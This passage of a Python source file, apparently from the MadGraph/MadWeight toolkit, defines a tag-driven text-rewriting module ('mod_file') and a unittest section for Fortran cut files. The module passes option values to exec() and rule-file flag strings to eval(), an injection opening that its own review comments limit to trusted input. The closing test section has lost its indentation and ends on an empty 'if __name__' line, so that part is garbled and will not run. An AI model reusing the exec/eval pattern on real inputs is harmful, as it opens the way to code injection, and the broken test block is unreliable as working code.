## 3) we apply the modification for $B$ NAME $E$ ##
## 4) we apply the modification for $B$ NAME $B$ TEXT $E$ NAME $E$ ##
## 5) we convert the $ ?-DIFF$ in normal tag ##
## ##
####################################################################################################
## ##
## Exemple of use: ##
## 1) with a master file ##
## ##
## import mod_file ##
## ##
## mod_file.mod_file(./master_file.txt) ##
## ##
## 2) without master file ##
## ##
## import mod_file ##
## ##
## mod_file.mod_file(file_to_change,rule,[write='']) ##
## file_to_change: can be string or list of file ##
## rule: position of the rule-file. You can also use a list of rule files (this must have ##
## the same length than file_to_change list ##
## ##
####################################################################################################
## ##
## master file ##
## is a file with tree column corresponding to mod_file/rule_file/write the write is ##
## not optional in file. Comment start with # in this file ##
## ##
## rule file ##
## in this file, you can defined, what are the new text to for each tag. Syntax is: ##
## $B$ NAME $B$ ##
## CONTENT ##
## $E$ NAME $E$ ##
## ##
####################################################################################################
## ##
## modification list: ##
## ##
## 01/06/10: - make the modification inside a unknow blok ##
## - add a test suite for MadWeight case ##
## ##
## 29/09/09: - differentiate $b$...$b$ from $B$...$B$ (gestion of end of line) ##
## ##
## 22/05/09: - add decomment option ##
## - ensure that all end of line use tag \n ##
## ##
## 11/11/08: - modify documentation ##
## - authorize differate affectation with B-DIFF ##
## ##
## 31/01/08: - pass in object ##
## - add S-comment super tag ##
## - add S-del super tag ##
## - pass in isolated module ##
## - create documentation ##
## - replace tag can be inserted in a line ##
## ##
## 23/06/08: - add S-REGEXP super tag ##
## - add function list ##
## - differentiate $B$...$E$ with $b$...$e$ ##
## the first supress the full tag line ##
## ##
####################################################################################################
## ##
## Function ##
## -------- ##
## ##
## mod_file ##
## mod_text ##
## Mod_file ##
## | + init ##
## | + mod_all_file ##
## | | + mod_one_file ##
## | | + mod_one_text ##
## | | + + treat_begin_end_line ##
## | + extract_modif ##
## | + return_mod_text ##
## | | + comment_text ##
## | | + del_text ##
## | | + regexp_text ##
## | + back_to_init_dir ##
## | + go_to_main_dir ##
## ##
####################################################################################################
# Module
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
import re
import shutil
import string
from time import time
from six.moves import range
# 1 ###############################################################
def mod_file(mod_file, rule_file='', write='', opt={}):
    """Entry point: apply tag-based modifications to one or more files.

    mod_file : a single path, a list of paths, or (when rule_file is empty)
               the path of a "master" file describing all modifications.
    rule_file: the rule file (or list of rule files, one per target).
    write    : output path(s); '' means modify in place.
    opt      : extra attributes forwarded to Mod_file (e.g. nowarning).
    """
    if rule_file:  # explicit rule file(s): not a master-file run
        if type(mod_file) != list:
            mod_obj = Mod_file(opt=opt)
            mod_obj.mod_one_file(mod_file, rule_file, write)
        else:
            # default: write each file in place
            if write == '':
                write = [''] * len(mod_file)
            if type(rule_file) == str:
                # Single rule file shared by every target: parse it once.
                # (Bug fix: the original expanded rule_file to a list *before*
                # this test, so this parse-once branch was unreachable and the
                # same rule file was re-parsed for every target.)
                mod_obj = Mod_file(rule_file=rule_file, opt=opt)
                for i in range(len(mod_file)):
                    mod_obj.mod_one_file(mod_file[i], mod_obj.dico, write[i])
            else:
                # one rule entry per target (replicate a single non-str rule)
                if type(rule_file) != list:
                    rule_file = [rule_file] * len(mod_file)
                mod_obj = Mod_file(opt=opt)
                for i in range(len(mod_file)):
                    mod_obj.mod_one_file(mod_file[i], rule_file[i], write[i])
    else:
        # master-file mode: mod_file is the master file
        mod_obj = Mod_file(mod_file, opt=opt)
# 1 ###############################################################
def mod_text(text, rule_file='', write=''):
    """Apply the rules of *rule_file* to *text* and return the result.

    When *write* is non-empty the result is also written to that path.
    """
    modifier = Mod_file()
    modifier.file = 'input text'
    return modifier.mod_one_text(text, rule_file, write)
# 1 ###############################################################
class Mod_file:
    """Tag-driven file modifier (the tag syntax is described in the module
    header).

    Instantiated with a master file it runs every modification listed there;
    instantiated with a rule file it loads the rules into ``self.dico`` so
    they can be applied to one or more files/texts.
    """

    # tags/files for which a "tag not defined" warning is suppressed;
    # the special value 'all' silences every warning
    nowarning = []

    # 2 ###############################################################
    def __init__(self, main_file='', rule_file='', opt={}):
        """Record the working directories and optionally run a master file
        (*main_file*) or preload a rule file (*rule_file*)."""
        self.d_init = os.getcwd()  # directory at instantiation time
        self.d_rule = os.getcwd()  # directory containing the rule files
        self.d_main = os.getcwd()  # working directory for the modifications
        self.failed = 0            # set to 1 when a tag lookup fails
        if opt:
            for key, value in opt.items():
                # NOTE(review): exec *evaluates* str(value), so an option
                # passed as the string "['A','B']" becomes a real list.
                # setattr() would not be a drop-in replacement because of
                # that evaluation; never feed this untrusted input.
                exec('self.' + key + '=' + str(value) + '')
        if main_file:
            # the master file location defines where rules and targets live
            self.d_rule = os.path.dirname(os.path.realpath(main_file))
            self.d_main = self.d_rule
            self.mod_all_file(os.path.basename(main_file))
        if rule_file:
            self.extract_modif(rule_file)

    # 2 ###############################################################
    def mod_all_file(self, rule_pos):
        """Apply all modifications listed in the master file *rule_pos*.

        Non-comment lines are either an option assignment (name = value;
        only 'main_dir' is understood) or three columns:
        file_to_modify  rule_file  output_file.
        """
        self.go_to_main_dir()
        # 'option = value' line
        opt_pattern = re.compile(r'''^\s*(?P<opt>\S+)\s*=\s*(?P<value>\S+)''')
        # three-column 'file rule write' line
        Pattern = re.compile(r'''^\s*(?P<file>\S+)\s+(?P<rule>\S+)\s+(?P<write>\S*)\s*$''')
        ff = open(rule_pos, 'r')
        while 1:
            line = ff.readline()
            if line == '':
                break
            if line[0] == '#':
                continue
            obj_opt = opt_pattern.search(line)
            if obj_opt:
                if obj_opt.group('opt') == 'main_dir':
                    self.d_main = os.path.join(self.d_main, obj_opt.group('value'))
                    self.go_to_main_dir()
            obj_pat = Pattern.search(line)
            if obj_pat:
                self.mod_one_file(obj_pat.group('file'), obj_pat.group('rule'),
                                  obj_pat.group('write'))
        ff.close()  # bug fix: the file handle used to be leaked
        self.back_to_init_dir()

    # 3 ###############################################################
    def mod_one_file(self, mod_file, rule_file, write=''):
        """Modify the file *mod_file* with the *rule_file* instructions; the
        output is placed in *write* (same file by default)."""
        self.go_to_main_dir()
        self.file = mod_file
        ff = open(mod_file, 'r')
        text = ff.read()
        ff.close()
        if write:
            self.mod_one_text(text, rule_file, write)
        else:
            self.mod_one_text(text, rule_file, mod_file)
        self.back_to_init_dir()
        return

    # 3 ###############################################################
    def mod_one_text(self, text, rule_file='', write=''):
        """Modify *text* following *rule_file* (a path, a rule dict, or ''
        to reuse ``self.dico``); write the result to *write* when given and
        return it."""
        self.go_to_main_dir()
        if rule_file == '':
            dico = self.dico
        elif type(rule_file) != dict:
            # bug fix: the result of extract_modif used to be dropped,
            # leaving 'dico' unbound and raising UnboundLocalError below
            dico = self.extract_modif(rule_file)
        else:
            dico = rule_file
        self.dico = dico
        # $B$ TAG $B$ TEXT $E$ TAG $E$
        begin_end = re.compile(
            r'''\$(?P<maj>B)\$\s?(?P<tag>\S+)\s?\$B\$(?P<text>.*)\$E\$\s?(?P=tag)\s?\$E\$''',
            re.S + re.I)
        # $$ END FILE $$
        end_file = re.compile(r'''\$\$\s*END\s+FILE\s*\$\$''')
        # $B$ TAG $E$
        replace = re.compile(r'''\$(?P<maj>B)\$[ \t]*(?P<tag>\S+)[ \t]*\$E\$''', re.I)
        # $E$ TAG $E$ TEXT $B$ TAG $B$ -> same tag used more than once
        end_begin = re.compile(
            r'''\$(?P<maj>E)\$\s?(?P<tag>\S+)\s?\$E\$(?P<text>.*)\$B\$\s?(?P=tag)\s?\$B\$''',
            re.S + re.I)
        # 1) global regular expressions
        for key in self.dico.keys():
            if key.startswith('S-REGEXP'):
                text = self.return_mod_text(key, text)
        # 2) decomment modules
        for key in self.dico.keys():
            if key.startswith('S-DECOMMENT_'):
                text = self.return_mod_text(key, text)
        # 3) single-tag replacements: $B$ TAG $E$
        text_list = replace.split(text)
        text_to_write = text_list.pop(0)
        while len(text_list) > 1:
            maj = text_list.pop(0).isupper()
            tag = text_list.pop(0)
            replacement = self.return_mod_text(tag, '')
            following = text_list.pop(0)
            text_to_write = self.treat_begin_end_line(maj, text_to_write,
                                                      replacement, following)
        # 4) block replacements: $B$ TAG $B$ ... $E$ TAG $E$
        text_list = begin_end.split(text_to_write)
        text_to_write = text_list.pop(0)
        while len(text_list) > 2:
            maj = text_list.pop(0).isupper()
            tag = text_list.pop(0)
            text = text_list.pop(0)
            multi = end_begin.search(text)
            if multi and multi.group('tag') == tag:
                mod_text = self.treat_multiple_tag(text, maj, tag)
            else:
                mod_text = self.return_mod_text(tag, text)
            text_next = text_list.pop(0)
            text_to_write = self.treat_begin_end_line(maj, text_to_write,
                                                      mod_text, text_next)
        # 5) S-END rule: append text at the end of the file
        if "S-END" in self.dico:
            if not end_file.search(text_to_write):
                text_to_write += self.dico["S-END"]
        # 6) restore differed affectations for a future pass
        text_to_write = text_to_write.replace('$B-DIFF$', '$B$')
        text_to_write = text_to_write.replace('$E-DIFF$', '$E$')
        # ensure that only one type of end of line is in use
        text_to_write = text_to_write.replace('\r\n', '\n')
        if write:
            ff = open(write, 'w')
            ff.writelines(text_to_write)
            ff.close()
        self.back_to_init_dir()
        return text_to_write

    # 4 #########################################################################
    def treat_begin_end_line(self, clearline, text_before, text, text_after):
        """Glue the replacement *text* between the surrounding chunks.

        When *clearline* is true (upper-case tag) and the previous tag lookup
        succeeded, the partial lines that carried the tags are dropped so the
        replacement owns full lines; otherwise plain concatenation is used.
        Always resets the failure flag.
        """
        if clearline and not self.failed:
            output = text_before[:text_before.rfind('\n')] + '\n'
            output += text
            output += '\n' + text_after[text_after.find('\n'):]
        else:
            output = text_before + text + text_after
        self.failed = 0
        return output

    # 4 #########################################################################
    def treat_multiple_tag(self, text, maj, tag):
        """Handle a block whose TAG appears more than once: the text between
        the first $E$ TAG $E$ and the next $B$ TAG $B$ is processed
        recursively, and both tagged sections are replaced."""
        # $E$ TAG $E$ TEXT $B$ TAG $B$
        end_begin = re.compile(
            r'''\$E\$\s?(?P<tag>\S+)\s?\$E\$(?P<text>.*)\$(?P<maj>B)\$\s?(?P=tag)\s?\$B\$''',
            re.S + re.I)
        split_text = end_begin.split(text)
        text1 = split_text.pop(0)
        tag = split_text.pop(0)
        mod_text = self.return_mod_text(tag, text1)
        text_next = split_text.pop(0)
        text_next = self.mod_one_text(text_next)
        text_to_write = self.treat_begin_end_line(maj, '', mod_text, text_next)
        # NOTE(review): the captured 'maj' group is the letter itself
        # ('B'/'b'), which is always truthy here -- confirm whether
        # .isupper() was intended, as in mod_one_text
        maj = split_text.pop(0)
        text2 = split_text.pop(0)
        mod_text = self.return_mod_text(tag, text2)
        text_to_write = self.treat_begin_end_line(maj, text_to_write, mod_text, '')
        return text_to_write

    #############################################################################
    #                         Extract rule information                          #
    #############################################################################
    # 2 ###############################################################
    def extract_modif(self, rule_file):
        """Parse *rule_file* and return (and store) the {tag: replacement
        text} dictionary ``self.dico``."""
        try:
            ff = open(rule_file, 'r')
        except IOError:
            # rule files may also be given relative to the rule directory
            ff = open(os.path.join(self.d_rule, rule_file), 'r')
        begin = re.compile(r'''^\$B\$\s?(?P<tag>\S+)\s?\$B\$''')
        end = re.compile(r'''^\$E\$\s?(?P<tag>\S+)\s?\$E\$''')
        comment = re.compile(r'''^##\**\s*$''')
        special_begin = re.compile(r'''^\$(?P<tag>S-\S+)-B\$''')
        special_end = re.compile(r'''^\$(?P<tag>S-\S+)-E\$''')
        special = re.compile(r'''^\$(?P<tag>S-\S+)\$''')
        self.dico = {}
        tag = ""
        replace_text = ""
        rec_mode = 0  # 1 while inside a $B$ .. $E$ block
        while 1:
            line = ff.readline()
            if line == '':
                break
            if comment.search(line):
                continue
            if special.search(line):
                # stand-alone special tag (e.g. $S-END$): empty content.
                # NOTE(review): this pattern also matches $...-B$/$...-E$
                # lines (no 'continue'), creating a spurious empty entry;
                # behavior kept as-is for compatibility.
                tag = special.search(line).group('tag')
                self.dico[tag] = ''
            if begin.search(line) or special_begin.search(line):
                match = begin.search(line) or special_begin.search(line)
                tag = match.group('tag')
                if rec_mode:
                    print('error in ', rule_file, ' wrong termination for ', tag, ' rule')
                    sys.exit()
                rec_mode = 1
                continue
            if end.search(line) or special_end.search(line):
                match = end.search(line) or special_end.search(line)
                tag = match.group('tag')
                if rec_mode == 0:
                    print('error in ', rule_file, 'no initial tag:', tag)
                    sys.exit()
                # one-line replacement => strip the trailing newline
                if replace_text.count('\n') == 1:
                    replace_text = replace_text[:-1]
                # trailing spaces are always stripped
                while replace_text.endswith(' '):
                    replace_text = replace_text[:-1]
                self.dico[tag] = replace_text
                tag = ""
                replace_text = ""
                rec_mode = 0
                continue
            if rec_mode:
                replace_text += line
        ff.close()  # bug fix: the file handle used to be leaked
        if rec_mode:
            print('error in ', rule_file, ' wrong end-file termination ')
            sys.exit()
        return self.dico

    #############################################################################
    #                              tag treatment                                #
    #############################################################################
    # 2 ###############################################################
    def return_mod_text(self, tag, text):
        """Return the replacement text linked to *tag*.

        Normal tags are looked up in ``self.dico``; special tags start with
        'S-' and are dispatched to the dedicated handlers:
        S-COMMENT_? / S-DECOMMENT_? / S-DEL / S-REGEXP_exp+new[+opt].
        """
        special_tag = re.compile(
            r'''S-(?P<tag>[^ \t\n\r\f\v_]+)_?(?P<opt>[^\t\n\r\f\v]*)''')  # S-TAG_OPT
        match = special_tag.search(tag)
        if not match:
            try:
                return self.dico[tag]
            except KeyError:
                if tag not in self.nowarning and self.nowarning != 'all':
                    print('WARNING: tag:', tag, ' not defined in file ', self.file)
                    print('no modification done for this tag')
                # keep the tag in place (around the recursively modified
                # content) so a later pass can still resolve it
                if text:
                    output = '$B$ ' + tag + ' $B$' + self.mod_one_text(text) + ' $E$ ' + tag + ' $E$'
                else:
                    output = '$B$ ' + tag + ' $E$'
                self.failed = 1
                return output
        # SPECIAL TAG CASE
        short_tag = match.group('tag')
        opt = match.group('opt').split('+')
        # re-join the pieces whose '+' was escaped with a backslash
        old = ''
        opt2 = []
        for part in opt:
            if len(part) and part[-1] == '\\':
                # bug fix: accumulate instead of overwriting so several
                # consecutive escaped '+' are all preserved
                old += part[:-1] + '+'
            else:
                opt2.append(old + part)
                old = ''
        opt = opt2
        tag = short_tag.lower()
        if tag == 'comment':
            text = self.comment_text(text, opt[0])
        elif tag == 'del':
            text = self.del_text(text)
        elif tag == 'regexp':
            if len(opt) == 2:
                text = self.regexp_text(text, opt[0], opt[1])
            elif len(opt) == 3:
                text = self.regexp_text(text, opt[0], opt[1], opt[2])
        elif tag == 'decomment':
            text = self.decomment_text(text, opt[0])
        return text

    # 3 ###############################################################
    def comment_text(self, text, comment_tag):
        """Comment out *text*: each line becomes 'TAG| line ... |' padded to
        a fixed-width box, delimited by 'TAG+---...---+' border lines."""
        text = comment_tag + '|\t' + text.replace('\n', '\n' + comment_tag + '|\t')
        if text[-3:] == "|\t\n":
            # drop the trailing empty commented line
            # (bug fix: the original kept only the last three characters)
            text = text[:-3]
        text = text.replace('\t', ' ')
        text2 = ''
        for line in text.split('\n'):
            if line == '':
                continue
            if len(line) < 74:
                if line[-1] == '\n':
                    line = line[:-1]
                # pad to the fixed box width before closing the border
                for i in range(len(line), 73):
                    line += ' '
                line += '|\n'
            else:
                line += '\n'
            text2 += line
        line = comment_tag + '+' + 71 * '-' + '+\n'
        return line + text2 + line + '\n'

    # 3 ###############################################################
    def decomment_text(self, text, comment_tag):
        """Inverse of comment_text: restore the original lines and replace
        the border lines by differed $B-DIFF$/$E-DIFF$ S-COMMENT tags."""
        # NOTE(review): comment_tag is inserted verbatim in the regex --
        # tags containing regex metacharacters would break; confirm callers
        carac_line = re.compile(comment_tag + r'\+' + 71 * '-' + r'\+')
        def decomment_line(line, comment_tag):
            # strip the 'TAG| ' prefix (written for 4-character tags) and
            # the trailing '|' padding
            if line[:6] == comment_tag + '| ':
                line = line[6:]
            else:
                print([line[:6]])
                print('failed decomment')
            if line[-1] == '|':
                line = line[:-1]
            return line
        decomment = 0
        init_text = text.split('\n')
        end_text = ''
        for line in init_text:
            if carac_line.search(line):
                # border line: toggle state and emit the differed tag
                decomment = not decomment
                if decomment:
                    end_text += comment_tag + ' $B-DIFF$ S-COMMENT_' + comment_tag + ' $B-DIFF$\n'
                    continue
                else:
                    end_text += comment_tag + ' $E-DIFF$ S-COMMENT_' + comment_tag + ' $E-DIFF$\n'
                    continue
            if decomment:
                end_text += decomment_line(line, comment_tag) + '\n'
            else:
                end_text += line + '\n'
        return end_text

    # 3 ###############################################################
    def del_text(self, text):
        """S-DEL handler: suppress this part of the file."""
        return ''

    # 3 ###############################################################
    def regexp_text(self, text, exp, new, opt=''):
        """Replace every match of the regular expression *exp* by *new*.

        opt: optional Python source for the re flags (e.g. 're.I'); an
        empty string means no flag.  (Bug fix: the original always ran
        eval(opt), which raised SyntaxError when opt was empty.)
        """
        # A) un-escape the reserved characters '_' and '+'
        exp = exp.replace('\\\\', '@888@')  # protect literal backslashes
        exp = exp.replace('\\_', '_').replace('\\+', '+')
        exp = exp.replace('@888@', '\\\\')  # end of the trick
        # B) apply the modification
        # NOTE(review): eval() on the rule-file flag string -- rule files
        # are trusted input here; do not expose this to untrusted data.
        flags = eval(opt) if opt else 0
        pattern = re.compile(exp, flags)
        # C) return the substituted text
        return pattern.sub(new, text)

    ############################################################################
    #                          positioning routine                             #
    ############################################################################
    # 2 ###############################################################
    def back_to_init_dir(self):
        """Return to the directory that was current at instantiation."""
        os.chdir(self.d_init)

    # 2 ###############################################################
    def go_to_main_dir(self):
        """Move to the directory where the modifications take place."""
        os.chdir(self.d_main)
#########################################################################################################
# TEST #################################################################################################
#########################################################################################################
if '__main__' == __name__:
import sys
sys.path.append('./Source/MadWeight/Python')
from . import create_run
import unittest
import os, shutil
class TestMod_file(unittest.TestCase):
""" Test the the mod routines works correctly on MadWeight """
def setUp(self):
""" create a copy of the original file """
shutil.copyfile('../Template/SubProcesses/cuts.f', './SubProcesses/cuts.bk')
def tearDown(self):
os.system('rm -f ./SubProcesses/cuts.mod')
os.system('rm -f ./SubProcesses/cuts.bk')
os.system('rm -f ./SubProcesses/cuts.o')
def test_cuts(self):
""" test if we can activate/desactivate the cuts """
self.assertEqual(create_run.cut_is_active('cuts.bk'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.bk'),1)
file_to_mod='./SubProcesses/cuts.bk'
rule='./Source/MadWeight/mod_file/suppress_cuts_MG'
#modify file
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'),1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
file_to_mod='./SubProcesses/cuts.mod'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'),1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'),1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'),1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
def test_mw_cuts(self):
file_to_mod ='./SubProcesses/cuts.bk'
rule= './Source/MadWeight/mod_file/mod_cuts'
mod_file(file_to_mod,rule, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'),1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
file_to_mod='./SubProcesses/cuts.mod'
rule = './Source/MadWeight/mod_file/suppress_cuts_MW'
mod_file(file_to_mod,rule, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'),1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
mod_file(file_to_mod,rule, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'),1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
mod_file(file_to_mod,rule, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'),1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
mod_file(file_to_mod,rule, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'),1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
def test_P_BW_cuts(self):
self.assertEqual(create_run.cut_is_active('cuts.bk'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.bk'),1)
file_to_mod='./SubProcesses/cuts.bk'
rule='./Source/MadWeight/mod_file/suppress_BW_cuts'
#modify file
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 0)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
file_to_mod='./SubProcesses/cuts.mod'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_cuts_MG'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_BW_cuts'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 0)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_cuts_MG'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 0)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_BW_cuts'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_cuts_MG'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_BW_cuts'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 0)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_cuts_MG'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 0)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
# Next one will Fail but is not supose to be called whitout check of the second
#rule='./Source/MadWeight/mod_file/suppress_cuts_MG'
#mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
#self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
#self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 0)
def test_MW_BW_cuts(self):
self.assertEqual(create_run.cut_is_active('cuts.bk'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.bk'),1)
file_to_mod='./SubProcesses/cuts.bk'
rule= './Source/MadWeight/mod_file/mod_cuts'
mod_file(file_to_mod,rule, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'),1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
file_to_mod='./SubProcesses/cuts.mod'
rule='./Source/MadWeight/mod_file/suppress_BW_cuts'
#modify file
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 0)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_cuts_MG'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_BW_cuts'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 0)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_cuts_MG'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 0)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_BW_cuts'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_cuts_MG'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_BW_cuts'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 0)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
if __name__ == '__main__':
